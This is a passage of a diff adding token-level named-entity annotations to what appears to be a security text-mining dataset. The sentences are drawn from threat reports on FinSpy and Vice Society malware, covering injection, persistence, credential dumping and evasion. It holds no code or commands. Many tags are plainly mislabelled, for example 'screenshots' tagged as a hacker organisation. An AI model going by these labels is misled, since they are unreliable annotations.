"ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Returns", + "information", + "about", + "the", + "operating", + "system" + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "computer", + "name" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "Overall", + "available", + "space", + "Space", + "available", + "to", + "current", + "user", + "(may", + "be", + "less", + "than", + "overall", + "available", + "space", + "due", + "to", + "quotas)", + "Disk", + "capacity" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Returns", + "information", + "about", + "the", + "computer", + "system" + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "checks", + "if", + "it", + "is", + "running", + "on", + "a", + "64-bit", + "system" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Returns", + "OSVERSIONINFOEXW", + "and", + "SYSTEM_INFO", + "structures" + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "the", + "current", + "process", + "name" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Returns", + "the", + "list", + "of", + "running", + "processes" + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Returns", + "ProcessDebugPort", + "value", + "returned", + "by", + "NtQueryInformationProcess", + "for", + "current", + "process." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Returns", + "ProcessDebugObjectHandle", + "value", + "returned", + "by", + "NtQueryInformationProcess", + "for", + "current", + "process" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Returns", + "process", + "names", + "of", + "the", + "current", + "process", + "tree", + "(i.e.", + "the", + "current", + "process,", + "the", + "parent", + "process,", + "the", + "grandparent", + "process,", + "etc.)" + ], + "ner_tags": [ + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "obtains", + "the", + "list", + "of", + "processes" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "extract", + "specific", + "information", + "about", + "running", + "processes" + ], + "ner_tags": [ + "O", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "regularly", + "obtains", + "the", + "list", + "of", + "running", + "processes." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "examines", + "all", + "the", + "processes", + "on", + "the", + "system" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "looks", + "for", + "specific", + "processes" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "acquires", + "handles", + "for", + "all", + "running", + "processes", + "on", + "the", + "system,", + "which", + "results", + "in", + "either", + "winlogon.exe", + "or", + "explorer.exe", + "obtaining", + "numerous", + "process", + "handles." + ], + "ner_tags": [ + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "When", + "it", + "detects", + "a", + "starting", + "first", + "(or", + "a", + "stopping", + "last)", + "instance", + "of", + "a", + "process", + "from", + "the", + "list" + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "running", + "processes" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "part", + "of", + "code", + "from", + "the", + ".text", + "section", + "(roughly", + "8", + "KB)", + "is", + "overwritten", + "with", + "heavily", + "obfuscated", + "code" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "obfuscated", + "code" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "obfuscated", + "trampoline", + "in", + "the", + ".text", + "section." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "trampoline", + "is", + "protected", + "with", + "an", + "obfuscator" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "obfuscated", + "with", + "FinSpy", + "Mutator" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "This", + "module", + "is", + "an", + "obfuscated", + "shellcode." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "obfuscated", + "DLL" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "obfuscated", + "with", + "FinSpy", + "VM." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "It", + "is", + "encrypted", + "with", + "a", + "256-byte", + "RC4", + "key." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "conceals", + "memory", + "areas", + "that", + "contain", + "the", + "Trojan", + "components’", + "code", + "and", + "data." + ], + "ner_tags": [ + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "encrypts", + "the", + "Orchestrator’s", + "pages", + "with", + "a", + "cipher", + "based", + "on", + "XOR", + "and", + "ROL", + "operations", + "and", + "assigns", + "the", + "PAGE_NOACCESS", + "attribute", + "to", + "them" + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "protected", + "with", + "an", + "obfuscator" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "An", + "obfuscator", + "similar", + "to", + "OLLVM", + "is", + "used", + "to", + "protect", + "FinSpy" + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "It", + "is", + "obfuscated", + "with", + "a", + "protector", + "resembling", + "the", + "open", + "source", + "OLLVM", + "obfuscator." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "The", + "encrypted", + "VFS", + "file." + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "setup", + "configuration", + "file,", + "which", + "is", + "encrypted", + "with", + "RC4" + ], + "ner_tags": [ + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "an", + "obfuscator", + "resembling", + "OLLVM", + "or", + "both", + "these", + "protectors" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "call", + "to", + "the", + "CreateWindowExW" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "NtTerminateProcess", + "and", + "ExitProcess", + "functions" + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "CreateFileW", + "API." + ], + "ner_tags": [ + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "API", + "function" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "various", + "WinAPI", + "functions." + ], + "ner_tags": [ + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "low-level", + "API", + "functions", + "(such", + "as", + "NtEnumerateValueKey", + "or", + "NtQuerySystemInformation)" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "NtTestAlert", + "function" + ], + "ner_tags": [ + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "call", + "the", + "NtTestAlert", + "function" + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "NtTestAlert", + "function" + ], + "ner_tags": [ + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "CreateProcessInternalW", + "API", + "function" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "NtQueueAPCThread", + "function" + ], + "ner_tags": [ + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "KiUserExceptionDispatcher", + "function" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "WinAPI", + "file", + "manipulation", + "functions." + ], + "ner_tags": [ + "B-SamFile", + "I-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "calling", + "API", + "functions", + "from", + "this", + "library" + ], + "ner_tags": [ + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "hooks", + "the", + "kernel’s", + "PsCreateSystemThread", + "function" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "launches", + "a", + "slightly", + "modified", + "Metasploit", + "Reverse", + "HTTPS", + "stager" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "connects", + "to", + "a", + "configured", + "C2", + "server", + "using", + "HTTPS", + "for", + "communication." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Makes", + "an", + "initial", + "POST", + "request", + "to", + "the", + "C2", + "server" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "the", + "C2", + "server", + "via", + "a", + "POST", + "request." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "All", + "communications", + "between", + "the", + "server", + "are", + "encrypted", + "with", + "RC4" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "encrypted", + "with", + "RC4" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "snippet", + "of", + "the", + "RC4", + "key", + "generation", + "function" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Returns", + "the", + "list", + "of", + "network", + "adapter", + "types,", + "IP", + "and", + "MAC", + "addresses", + "assigned", + "to", + "them." + ], + "ner_tags": [ + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Returns", + "names", + "of", + "shortcuts", + "in", + "the", + "Desktop", + "directory." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Returns", + "the", + "path", + "to", + "the", + "‘Program", + "Files’", + "folder." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Returns", + "the", + "short", + "form", + "of", + "the", + "user’s", + "profile", + "folder" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Returns", + "the", + "user’s", + "profile", + "folder" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Returns", + "the", + "list", + "of", + "object", + "names", + "in", + "the", + "\\GLOBAL??", + "directory." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Retrieve", + "the", + "list", + "of", + "files" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "gets", + "the", + "list", + "of", + "recent", + "files" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "search,", + "delete", + "files." + ], + "ner_tags": [ + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "file", + "listings" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "Create", + "file", + "listing", + "recordings" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Returns", + "the", + "path", + "to", + "the", + "user’s", + "temporary", + "folder." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Returns", + "the", + "current", + "domain", + "SID" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Returns", + "the", + "current", + "user���s", + "name" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Returns", + "the", + "current", + "user’s", + "SID." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WMI", + "query" + ], + "ner_tags": [ + "B-Time", + "O" + ] + }, + { + "tokens": [ + "Creates", + "a", + "scheduled", + "task", + "that", + "runs", + "at", + "system", + "startup" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Task", + "Scheduler", + "launches", + "it", + "at", + "system", + "startup" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "scheduled", + "task", + "properties" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "DLL", + "obfuscated", + "with", + "VMProtect." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "unpacking", + "the", + "Orchestrator" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "unpacks", + "it", + "with", + "aPLib." + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Orchestrator", + "is", + "unpacked" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Orchestrator", + "(as", + "well", + "as", + "plugins)", + "are", + "packed", + "with", + "aPLib", + "and", + "encrypted", + "with", + "AES." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "unpacks", + "with", + "aPLib" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "encrypted", + "with", + "XOR", + "and", + "compressed", + "with", + "aPLib." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "unpacks", + "it", + "with", + "aPLib" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "takes", + "a", + "screenshot" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "screenshots" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "screen" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "take", + "screenshots", + "during,", + "online", + "conversations." + ], + "ner_tags": [ + "I-Features", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Capture", + "the", + "screen", + "area", + "around", + "mouse", + "click", + "locations" + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Take", + "screenshots", + "with", + "a", + "specified", + "frame", + "rate,", + "and", + "livestream", + "or", + "record", + "them." + ], + "ner_tags": [ + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "screenshots" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "Commands", + "are", + "used", + "to", + "download", + "and", + "install", + "plugins" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Commands", + "are", + "used", + "to", + "download", + "and", + "run", + "the", + "Trojan", + "Installer." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "I-Features", + "B-SecTeam" + ] + }, + { + "tokens": [ + "Upload,", + "download" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "downloading", + "and", + "executing", + "specific", + "utilities" + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "downloads", + "Security", + "Shellcodes", + "from", + "the", + "C2", + "server" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "may", + "save", + "recording", + "files", + "in", + "the", + "working", + "directory" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "stored", + "in", + "the", + "working", + "directory" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "malware’s", + "working", + "directory" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Once", + "the", + "working", + "directory", + "is", + "prepared," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "keylogs" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "keystrokes" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "record", + "keystrokes" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "Delete", + "a", + "recording", + "with", + "a", + "given", + "filename", + "from", + "the", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Uninstall", + "the", + "backdoor." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "B-Way" + ] + }, + { + "tokens": [ + "wipes", + "all", + "the", + "files", + "and", + "registry", + "keys", + "created", + "by", + "the", + "backdoor" + ], + "ner_tags": [ + "B-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "delete", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "creating", + "an", + "APC", + "(Asynchronous", + "Procedure", + "Call)", + "with", + "the", + "procedure", + "address", + "pointing", + "to", + "the", + "start", + "of", + "the", + "shellcode." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APC", + "injections" + ], + "ner_tags": [ + "B-Way", + "O" + ] + }, + { + "tokens": [ + "The", + "asynchronous", + "procedure", + "places", + "a", + "hook", + "on", + "the", + "NtTestAlert", + "function", + "and", + "then", + "exits" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "will", + "be", + "loaded", + "with", + "the", + "help", + "of", + "the", + "APC", + "injection", + "loader." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "hooked", + "process", + "creation", + "function", + "clears", + "a", + "possible", + "hook", + "of", + "the", + "NtQueueAPCThread", + "function", + "and", + "then", + "uses", + "it", + "to", + "create", + "an", + "APC", + "procedure", + "in", + "the", + "new", + "process." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "junk", + "code", + "created", + "by", + "the", + "ProcessWorm", + "loader" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "entries", + "point", + "to", + "buffers", + "of", + "randomly", + "generated", + "junk", + "code" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "method", + "names", + "contain", + "junk." + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "executable", + "is", + "prepended", + "with", + "0x4000", + "random", + "bytes", + "and", + "encrypted", + "with", + "RC4" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "documents", + "sent", + "to", + "the", + "printer." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Steal", + "files", + "which", + "are", + "printed", + "by", + "the", + "victim" + ], + "ner_tags": [ + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "recently", + "opened", + "documents" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Uninstall", + "a", + "plugin", + "from", + "the", + "machine" + ], + "ner_tags": [ + "B-Way", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sets", + "up", + "persistence", + "by", + "creating", + "an", + "entry", + "in", + "the", + "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", + "registry", + "key." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "adds", + "it", + "to", + "the", + "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", + "key" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Bash", + "script" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "launched", + "on", + "every", + "startup", + "by", + "rundll32.exe" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "creates", + "a", + "thread", + "in", + "the", + "kernel", + "that", + "injects", + "the", + "next", + "stage", + "into", + "winlogon.exe." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "A", + "thread", + "with", + "trampoline", + "shellcode", + "is", + "created", + "inside", + "exe." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "victim", + "downloads", + "a", + "Trojanized", + "application", + "and", + "executes", + "it." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "we", + "identified", + "numerous", + "legitimate", + "applications", + "backdoored" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TeamViewer" + ], + "ner_tags": [ + "B-SamFile" + ] + }, + { + "tokens": [ + "Cleans", + "API", + "functions", + "potentially", + "hooked", + "by", + "security", + "solutions" + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "attackers", + "also", + "exploited", + "vulnerabilities", + "such", + "as", + "PrintNightmare", + "to", + "escalate", + "privileges" + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Software", + "vulnerabilities,", + "such", + "as", + "PrintNightmare", + "(CVE-2021-1675)", + "and", + "(CVE-2021-34527),", + "may", + "be", + "exploited", + "in", + "an", + "attempt", + "to", + "elevate", + "privileges." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "has", + "operated", + "sites", + "on", + "the", + "Tor", + "network", + "using", + "the", + "following", + ".onion" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "this", + "key", + "is", + "typically", + "obfuscated", + "with", + "AES", + "256", + "encryption." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "encrypted", + "PowerShell." + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "Upon", + "execution,", + "the", + "ransomware", + "binary", + "deletes", + "itself" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Creating", + "the", + "HKCU\\Software\\Zeppelin", + "registry", + "key" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "by", + "modifying", + "the", + "Registry." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "valid", + "credentials", + "have", + "been", + "used", + "by", + "Vice", + "Society", + "to", + "gain", + "initial", + "access." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Internet-facing", + "applications", + "and", + "systems", + "vulnerabilities", + "can", + "be", + "exploited,", + "such", + "as", + "PrintNightmare", + "(CVE-2021-1675)", + "and", + "(CVE-2021-34527),", + "to", + "gain", + "initial", + "access." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Features", + "O", + "B-Features", + "O", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Batch", + "files", + "are", + "used" + ], + "ner_tags": [ + "B-SamFile", + "I-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "features", + "multiple", + "flags", + "that", + "could", + "be", + "set", + "as", + "command", + "line", + "arguments" + ], + "ner_tags": [ + "O", + "O", + "B-Features", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Persistence", + "is", + "maintained", + "after", + "boot/reboot", + "via", + "malicious", + "autostart", + "registry", + "keys." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "utilizes", + "legitimate", + "programs", + "to", + "side-load", + "the", + "group’s", + "own", + "DLL", + "to", + "execute", + "their", + "payload." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Malicious", + "commands", + "are", + "executed", + "via", + "WMI", + "as", + "a", + "means", + "of", + "“living", + "off", + "the", + "land”", + "and", + "avoiding", + "detection." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "execute", + "commands", + "via", + "scheduled", + "tasks/jobs." + ], + "ner_tags": [ + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Files", + "dropped", + "in", + "the", + "victim’s", + "environment", + "by", + "Vice", + "Society", + "may", + "have", + "been", + "altered", + "to", + "appear", + "legitimate." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "attempts", + "to", + "disable", + "Windows", + "Defender" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Attempts", + "to", + "disable", + "or", + "modify", + "endpoint", + "security,", + "such", + "as", + "Microsoft", + "Defender,", + "on", + "compromised", + "devices." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "B-SecTeam", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "utilizes", + "comsvcs.dll", + "to", + "dump", + "credentials", + "from", + "Local", + "Security", + "Authority", + "Subsystem", + "Service." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RDP", + "is", + "used", + "by", + "the", + "group", + "for", 